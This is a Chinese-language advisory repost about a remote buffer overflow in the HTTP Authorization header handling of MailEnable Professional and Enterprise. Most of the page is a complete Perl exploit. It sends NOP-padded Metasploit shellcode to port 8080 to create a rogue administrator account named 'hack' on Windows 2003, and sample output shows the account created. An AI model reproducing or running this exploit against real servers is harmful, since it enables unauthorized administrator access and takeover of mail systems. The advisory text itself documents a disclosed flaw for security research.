MailEnable HTTPS头选项处理缓冲区溢出漏洞

2008-04-09 04:24:16来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

MailEnable HTTPS头选项处理缓冲区溢出漏洞

发布日期:2005-04-26
更新日期:2005-04-26

受影响系统:
MailEnable MailEnable Professional <= 1.54
MailEnable MailEnable Enterprise <= 1.04
描述:
BUGTRAQ ID: 13350

MailEnable是一款邮件服务程序。

MailEnable对于头选项的处理存在漏洞,远程攻击者可能攻击者可能利用此漏洞在主机上执行任意指令。

MailEnable在处理HTTP头字段“Authorization”存在远程缓冲区溢出漏洞,远程攻击者可以利用这个漏洞覆盖敏感的服务控制变量,从而控制服务进程的执行流程。

<*来源:CorryL (corryl80@gmail.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111445834220015&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl
# This tools and to consider only himself to educational purpose
#
#
#-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-
#-=[ ]=-
#-=[ Discovered & Coded by CorryL info:www.x0n3-h4ck.org]=-
#-=[ irc.xoned.net #x0n3-h4ck corryl80[at]gmail.com]=-
#
#[ ]Connecting to 127.0.0.1
#[ ]Sending Evil Request
#[ ]Creating Administrator User
#Connect to 127.0.0.1 Using User (hack) Pass (hack)
#
#D:\Documents and Settings\Administrator\Desktop\prova bof\mailenable-bug exploit
#>net users
#
#Account utente per \\SERVER
#
#-------------------------------------------------------------------------------
#__vmware_user__ Administrator ASPNET
#Guest hack IME_ADMIN
#IME_USER IUSR_SERVER IWAM_SERVER
#SUPPORT_388945a0
#Esecuzione comando riuscita.
#
#
#Greatz All Users & Friends on irc.xoned.net #x0n3-h4ck


use IO::Socket;
$ret = "\x6c\x36\xb7"; #RET For Win2003
$nop = "\x90"x24;
#win32_adduser - PASS=hack EXITFUNC=thread USER=hack Size=240 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc7".
"\x7e\x10\xf5\x83\xeb\xfc\xe2\xf4\x3b\x96\x56\xf5\xc7\x7e\x9b\xb0".
"\xfb\xf5\x6c\xf0\xbf\x7f\xff\x7e\x88\x66\x9b\xaa\xe7\x7f\xfb\x16".
"\xe9\x37\x9b\xc1\x4c\x7f\xfe\xc4\x07\xe7\xbc\x71\x07\x0a\x17\x34".
"\x0d\x73\x11\x37\x2c\x8a\x2b\xa1\xe3\x7a\x65\x16\x4c\x21\x34\xf4".
"\x2c\x18\x9b\xf9\x8c\xf5\x4f\xe9\xc6\x95\x9b\xe9\x4c\x7f\xfb\x7c".
"\x9b\x5a\x14\x36\xf6\xbe\x74\x7e\x87\x4e\x95\x35\xbf\x71\x9b\xb5".
"\xcb\xf5\x60\xe9\x6a\xf5\x78\xfd\x2e\x75\x10\xf5\xc7\xf5\x50\xc1".
"\xc2\x02\x10\xf5\xc7\xf5\x78\xc9\x98\x4f\xe6\x95\x91\x95\x1d\x9d".
"\x28\xb0\xf0\x95\xaf\xe6\xee\x7f\xc9\x29\xef\x12\x2f\x90\xef\x0a".
"\x38\x1d\x7d\x91\xe9\x1b\x68\x90\xe7\x51\x73\xd5\xa9\x1b\x64\xd5".
"\xb2\x0d\x75\x87\xe7\x16\x71\x96\xac\x5e\x78\x94\xa4\x15\x30\xda".
"\x86\x3a\x54\xd5\xe1\x58\x30\x9b\xa2\x0a\x30\x99\xa8\x1d\x71\x99".
"\xa0\x0c\x7f\x80\xb7\x5e\x51\x91\xaa\x17\x7e\x9c\xb4\x0a\x62\x94".
"\xb3\x11\x62\x86\xe7\x16\x71\x96\xac\x5e\x3f\xb4\x83\x3a\x10\xf5";

use Getopt::Std; getopts('h:', \%args);


if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-\n";
print STDERR "-=[ ]=-\n";
print STDERR "-=[ Discovered & Coded by CorryL info:www.x0n3-h4ck.org]=-\n";
print STDERR "-=[ irc.xoned.net #x0n3-h4ck corryl80[at]gmail.com]=-\n\n";

if (!defined($host)) {
Usage();
}

$bof = $nop.$shellcode.$ret;
$ric = "GET / HTTP/1.0\r\n";
$ric2 = "Authorization: $bof\r\n\r\n";
$richiesta = $ric.$ric2;
print "[ ]Connecting to $host\n";
sleep 2;
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 8080,
Proto => 'tcp');
die unless $socket;
print "[ ]Sending Evil Request\n";
sleep 2;
print $socket "$richiesta";
print "[ ]Creating Administrator User\n";

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft MSN Messenger PNG图片解析远程代码执行漏洞(MS05-009

下一篇:Shoutbox SCRIPT 3.0.2及以下版本用户名和口令MD5泄露漏洞